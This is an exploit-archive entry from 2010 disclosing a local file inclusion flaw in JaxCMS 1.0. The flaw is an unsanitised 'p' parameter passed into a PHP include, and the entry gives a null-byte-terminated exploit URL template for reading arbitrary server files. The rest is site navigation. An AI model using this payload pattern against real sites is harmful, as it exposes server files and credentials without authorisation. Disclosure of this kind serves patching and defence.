JaxCMS Local File Inclusion

JaxCMS Local File Inclusion: Posted Feb 8, 2010; Authored by MizoZ; JaxCMS version 1.0 suffers from a local file inclusion vulnerability.; tags | exploit, local, file inclusion; SHA-256 | 29a0319aa46221f5065686f0eb18e5ce7880bf4e7ccf6b4113a71a2fc52c7b6c; Download | Favorite | View

JaxCMS Local File Inclusion

/*

Name : JaxCMS (p) Local File Include
WebSite : http://www.pixiescripts.com/
Demo : http://www.pixiescripts.com/demo/JaxCMS1.0/

Author : Hamza 'MizoZ' N.
Email : mizozx@gmail.com

Greetz : Zuka !

*/

The vulnerability is in the get $_GET['p'] , the index.php include
'/pages/'.$_GET['p'].'.php'

So we can read any file in the server .

EXPLOIT :

[HOST]/[JaxCMS PATH]/index.php?p=[LFI]%00

Top Authors In Last 30 Days

Red Hat 136 files
Ubuntu 91 files
indoushka 33 files
Debian 22 files
nu11secur1ty 15 files
Gentoo 13 files
Apple 13 files
Google Security Research 8 files
CraCkEr 6 files
mjurczyk 4 files

File Archives

Systems

AIX (428)
Apple (2,016)
BSD (374)
CentOS (57)
Cisco (1,925)
Debian (6,846)
Fedora (1,692)
FreeBSD (1,245)
Gentoo (4,335)
HPUX (879)
iOS (355)
iPhone (108)
IRIX (220)
Juniper (68)
Linux (46,841)
Mac OS X (687)
Mandriva (3,105)
NetBSD (256)
OpenBSD (485)
RedHat (13,925)
Slackware (941)
Solaris (1,610)
SUSE (1,444)
Ubuntu (8,949)
UNIX (9,317)
UnixWare (186)
Windows (6,590)
Other

JaxCMS Local File Inclusion

JaxCMS Local File Inclusion

File Archive:

September 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

JaxCMS Local File Inclusion

Share This

JaxCMS Local File Inclusion

File Archive:

September 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems